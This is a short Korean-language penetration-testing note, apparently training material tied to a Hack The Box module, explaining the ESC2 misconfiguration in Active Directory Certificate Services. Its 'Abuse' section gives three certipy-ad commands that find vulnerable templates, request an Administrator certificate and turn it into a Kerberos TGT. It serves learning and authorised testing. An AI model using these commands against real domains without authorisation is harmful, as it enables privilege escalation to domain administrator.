1 of 1

ESC2

ESC2는 다음과 같은 조건을 만족할 때 발생하는 ADCS 취약점입니다.

인증서 템플릿이 'Any Purpose'로 설정되어 있거나, EKU가 지정되지 않은 경우
템플릿이 인증서 서명 요청(CSR) 시 SAN을 지정하도록 허용하는 경우
낮은 권한의 사용자가 해당 템플릿을 사용하여 인증서를 등록할 수 있도록 설정된 경우

속성

값

Requires Manager Approval

False

Enrollment Rights

하위 수준 도메인 사용자 또는 모든 사용자

Authorized Signatures Required

Any Purpose / EKU

True / False

Abuse

ESC2는 ESC1과 매우 유사한 점에서, 취약점을 악용하는 명령어 또한 동일합니다.

# 취약한 템플릿 검색
certipy-ad find -u <USER> -p <PASS> -dc-ip <dc-ip> -vulnerable -stdout -enabled

# 취약한 템플릿을 이용하여 타겟 유저 인증서 발급
certipy-ad req -u <USER> -p <PASS> -ca <CA> -target <DC FQDN> -template <Template> -upn Administrator -dc-ip <dc-ip>

# 인증서를 통한 TGT 발급
certipy-ad auth -pfx <PFX File> -domain <Domain> -dc-ip <dc-ip>

References

https://academy.hackthebox.com/module/236/section/2540academy.hackthebox.com